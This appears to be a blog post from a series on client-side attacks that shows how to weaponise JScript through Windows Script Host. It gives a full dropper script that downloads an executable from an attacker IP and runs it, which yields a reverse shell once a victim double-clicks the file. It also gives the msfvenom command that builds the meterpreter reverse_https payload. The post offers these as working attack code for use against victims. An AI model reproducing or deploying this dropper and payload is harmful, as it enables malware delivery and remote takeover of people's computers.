Weaponising JScript

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.


When looking at exploiting operating systems and conducting client-side attacks it is very important to learn to "live off the land", this term refers to utilising software already installed on the target machine and learning to understand how the software operates as standard.


In this example, we will be covering Jscript, which is a derivative of JavaScript developed by Microsoft that is used in Internet Explorer. It can also be used outside the browser through Windows Script Host


When executed outside of a web browser, Jscript is not subject to any of the security restrictions enforced by a browser sandbox. This means we can use it as a client-side code execution vector without exploiting any vulnerabilities.


This is very useful, as by default powershell scprits are opened by notepad meaning that if you were to open or click on it by mistake it will open in notpad only showing the text.


Dropper Example


After saving this code as a .js file, all the victim has to do is double-click and the hacker will get a shell from the victim's machine to our metasploit multi/handler listener.


var url = "http://192.168.49.60/evil.exe"
var Object = WScript.CreateObject('MSXML2.XMLHTTP');

Object.Open('GET', url, false);
Object.Send();

if (Object.Status == 200)
{
    var Stream = WScript.CreateObject('ADODB.Stream');

    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.Position = 0;

    Stream.SaveToFile("evil.exe", 2);
    Stream.Close();
}

var r = new ActiveXObject("WScript.Shell").Run("evil.exe");

Payload Example


The payload used in the example is a .exe created using msfvenom for the reverse shell stager over https on 443. Please note this file will need to be moved to the location of your webserver.


msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f exe -o evil.exe



Video Example






10 views0 comments

Recent Posts

See All

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Over the last few weeks, we have been building payloads an

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. Running Shell Code in C# Using lessons learnt from the last few weeks from both VBA

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers. As discussed last week, office products are some of the most widely utilised produc